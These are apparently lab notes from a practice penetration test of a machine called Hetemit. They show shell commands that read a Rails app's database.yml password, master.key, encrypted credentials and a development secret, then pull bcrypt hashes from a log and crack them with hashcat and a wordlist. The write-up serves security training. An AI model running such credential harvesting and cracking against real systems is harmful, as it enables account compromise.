register_hetemit

Checking for the web root directory of the register_hetemit application, which has the PID of 1394

It’s located at the home directory of the current user; cmeeks

[cmeeks@hetemit ~]$ cd register_hetemit/ ; ls -la
total 424
drwxr-xr-x   15 cmeeks cmeeks   4096 Nov 12  2020 .
drwx------.  12 cmeeks cmeeks   4096 Feb  4 21:02 ..
-rw-r--r--    1 cmeeks cmeeks      9 Nov 12  2020 .browserslistrc
drwxr-xr-x    8 cmeeks cmeeks    166 Nov 12  2020 .git
-rw-r--r--    1 cmeeks cmeeks    771 Nov 12  2020 .gitignore
-rw-r--r--    1 cmeeks cmeeks     11 Nov 12  2020 .ruby-version
-rw-r--r--    1 cmeeks cmeeks   1971 Nov 12  2020 Gemfile
-rw-r--r--    1 cmeeks cmeeks   5550 Nov 12  2020 Gemfile.lock
-rw-r--r--    1 cmeeks cmeeks    374 Nov 12  2020 README.md
-rw-r--r--    1 cmeeks cmeeks    227 Nov 12  2020 Rakefile
drwxr-xr-x   11 cmeeks cmeeks    142 Nov 12  2020 app
-rw-r--r--    1 cmeeks cmeeks   1722 Nov 12  2020 babel.config.js
drwxr-xr-x    2 cmeeks cmeeks    125 Nov 12  2020 bin
drwxr-xr-x    6 cmeeks cmeeks    306 Nov 13  2020 config
-rw-r--r--    1 cmeeks cmeeks    130 Nov 12  2020 config.ru
drwxr-xr-x    3 cmeeks cmeeks     54 Nov 12  2020 db
drwxr-xr-x    4 cmeeks cmeeks     33 Nov 12  2020 lib
drwxr-xr-x    2 cmeeks cmeeks     42 Nov 12  2020 log
drwxr-xr-x  769 cmeeks cmeeks  24576 Nov 13  2020 node_modules
-rw-r--r--    1 cmeeks cmeeks    325 Nov 12  2020 package.json
-rw-r--r--    1 cmeeks cmeeks    224 Nov 12  2020 postcss.config.js
drwxr-xr-x    3 cmeeks cmeeks    172 Nov 12  2020 public
drwxr-xr-x    3 cmeeks cmeeks     29 Nov 12  2020 storage
drwxr-xr-x   10 cmeeks cmeeks    195 Nov 12  2020 test
drwxr-xr-x    6 cmeeks cmeeks    123 Nov 12  2020 tmp
drwxr-xr-x    2 cmeeks cmeeks     19 Nov 12  2020 vendor
-rw-r--r--    1 cmeeks cmeeks 332349 Nov 12  2020 yarn.lock

There are some configuration files and a directory

Configuration

[cmeeks@hetemit register_hetemit]$ cat config.ru 
# This file is used by Rack-based servers to start the application.
 
require_relative 'config/environment'
 
run Rails.application
 
[cmeeks@hetemit register_hetemit]$ cd config/ ; ls -la
total 52
drwxr-xr-x  6 cmeeks cmeeks  306 Nov 13  2020 .
drwxr-xr-x 15 cmeeks cmeeks 4096 Nov 12  2020 ..
-rw-r--r--  1 cmeeks cmeeks  666 Nov 12  2020 application.rb
-rw-r--r--  1 cmeeks cmeeks  207 Nov 12  2020 boot.rb
-rw-r--r--  1 cmeeks cmeeks  197 Nov 12  2020 cable.yml
-rw-r--r--  1 cmeeks cmeeks  464 Nov 12  2020 credentials.yml.enc
-rw-r--r--  1 cmeeks cmeeks 3082 Nov 13  2020 database.yml
-rw-r--r--  1 cmeeks cmeeks  128 Nov 12  2020 environment.rb
drwxr-xr-x  2 cmeeks cmeeks   64 Nov 12  2020 environments
drwxr-xr-x  2 cmeeks cmeeks  262 Nov 12  2020 initializers
drwxr-xr-x  2 cmeeks cmeeks   20 Nov 12  2020 locales
-rw-------  1 cmeeks cmeeks   32 Nov 12  2020 master.key
-rw-r--r--  1 cmeeks cmeeks 1585 Nov 12  2020 puma.rb
-rw-r--r--  1 cmeeks cmeeks  253 Nov 12  2020 routes.rb
-rw-r--r--  1 cmeeks cmeeks   97 Nov 12  2020 spring.rb
-rw-r--r--  1 cmeeks cmeeks 1093 Nov 12  2020 storage.yml
drwxr-xr-x  2 cmeeks cmeeks   86 Nov 12  2020 webpack
-rw-r--r--  1 cmeeks cmeeks 1954 Nov 12  2020 webpacker.yml

Checking the config directory

DB Credential

[cmeeks@hetemit config]$ cat /home/cmeeks/register_hetemit/config/database.yml  | grep -v '^#'
default: &default
  adapter: postgresql
  encoding: unicode
  # For details on connection pooling, see Rails configuration guide
  # https://guides.rubyonrails.org/configuring.html#database-pooling
  pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
 
development:
  <<: *default
  database: register_hetemit
  username: railsdev
  password: OpenProduceTreat153
 
[...REDACTED...]

DB credential identified

Encrypted Credential

[cmeeks@hetemit config]$ cat credentials.yml.enc 
uVh9vtpvSxSDb8ziQMlZn0c36nxVICZIz0xNJyQnIVc9oLOSxmRMIvUEHHsyWYJUUybzt9PQPtNu6sXd972hD/ED7Yu5XAXoxP64xSGtjqdbOAOPBxauh4JDQm4dO0Az6S3F914yDxJ7LD17/RYwMOky8RbfjVJXEaZT934OXCh2GWI8bjwGy8qamYZ5EqjH7IdfHHpVcCuZoyjgyvCwQHxIIlzVsf+ERJWahOa0DAIpAB+Y76dLGhJxLMLokg3LxhahiV9ZrymNHlpugqZJA/LX2EyeWJ92WHpzysKPeMbat8o5xwQwsgJ92yqQutcdUAzI5L+faTUzOWnkoHQ+j/s2ZBCqwbXGPvpnuhkght8rUMGJbQAPwGce+T97K2HSCaZe9+HTrmGmY4ikRO/QBOeRaAbgdlIBCQjk--KXo9J+QmBaKbVFLz--9pBMZYMrjhAlj5EWBjFHVA==
 
[cmeeks@hetemit config]$ cat master.key 
13d501513ae570e4d2e50edfa97de275

Encrypted credential and key

`tmp/development_secret.txt`

[cmeeks@hetemit register_hetemit]$ cat tmp/development_secret.txt 
716e96c9641423bae8197fd5240d783493e99bcbaa0945ddc8b60d6592f8b3964754a43f5bce410ee25fb4681928690382bc2f52657b91a60f9f850d621ddde8

development_secret.txt

log

[cmeeks@hetemit register_hetemit]$ cd log/ ; ll
total 12028
-rw-r--r-- 1 cmeeks cmeeks 12316009 Feb  4 20:51 development.log
[cmeeks@hetemit log]$ grep -i -R "password_digest" ./
./development.log:NoMethodError (undefined method `password_digest=' for #<User:0x00007fa1b0c14ea0>
./development.log:NoMethodError (undefined method `password_digest=' for #<User:0x00007fa1b0eda090>
./development.log:NoMethodError (undefined method `password_digest' for #<User:0x0000564bd0108570>
./development.log:   (4.1ms)  ALTER TABLE "users" RENAME COLUMN "password" TO "password_digest"
./development.log:  User Create (2.8ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at") VALUES ($1, $2, $3, $4, $5) RETURNING "id"  [["email", "alexertech@local"], ["username", "alexertech"], ["password_digest", "$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O"], ["created_at", "2020-11-12 16:38:48.050415"], ["updated_at", "2020-11-12 16:38:48.050415"]]
./development.log:  User Create (1.5ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at") VALUES ($1, $2, $3, $4, $5) RETURNING "id"  [["email", "alexertech@local"], ["username", "alexertech"], ["password_digest", "$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO"], ["created_at", "2020-11-12 16:44:22.769816"], ["updated_at", "2020-11-12 16:44:22.769816"]]
./development.log:  User Create (5.4ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at", "invite_code") VALUES ($1, $2, $3, $4, $5, $6) RETURNING "id"  [["email", "test@testing"], ["username", "test"], ["password_digest", "$2a$12$YjUfD0ILSfReOUv507.cD.g3UWpvDdgDlow9uBUKC5YALfFDZdpGG"], ["created_at", "2020-11-12 19:23:41.460130"], ["updated_at", "2020-11-12 19:23:41.460130"], ["invite_code", "5a81d05b8969fd1f156969da357bcd7f9bf0430c90035f017c88f9b5249b3e9e"]]
./development.log:   (0.3ms)  ALTER TABLE "users" RENAME COLUMN "password" TO "password_digest"

2 following hashes were identified:

$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O
$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ hashcat --show ./hashes.txt                                          
The following 4 hash-modes match the structure of your input hash:
 
      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ hashcat -m 3200 -a 0 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O:myself
$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO:myself
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: ./hashes.txt
Time.Started.....: Tue Feb  4 22:29:24 2025 (35 secs)
Time.Estimated...: Tue Feb  4 22:29:59 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       50 H/s (4.85ms) @ Accel:12 Loops:8 Thr:1 Vec:1
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 1728/28688770 (0.01%)
Rejected.........: 0/1728 (0.00%)
Restore.Point....: 720/14344385 (0.01%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4088-4096
Candidate.Engine.: Device Generator
Candidates.#1....: dreamer -> felipe
Hardware.Mon.#1..: Util: 89%
 
Started: Tue Feb  4 22:28:51 2025
Stopped: Tue Feb  4 22:30:00 2025

Hashes cracked; myself N/A

InfoSec LAB

Explorer

Hetemit_register_hetemit

register_hetemit

Configuration

DB Credential

Encrypted Credential

`tmp/development_secret.txt`

log

Password Cracking

Interactive Graph View

Table of Contents

Backlinks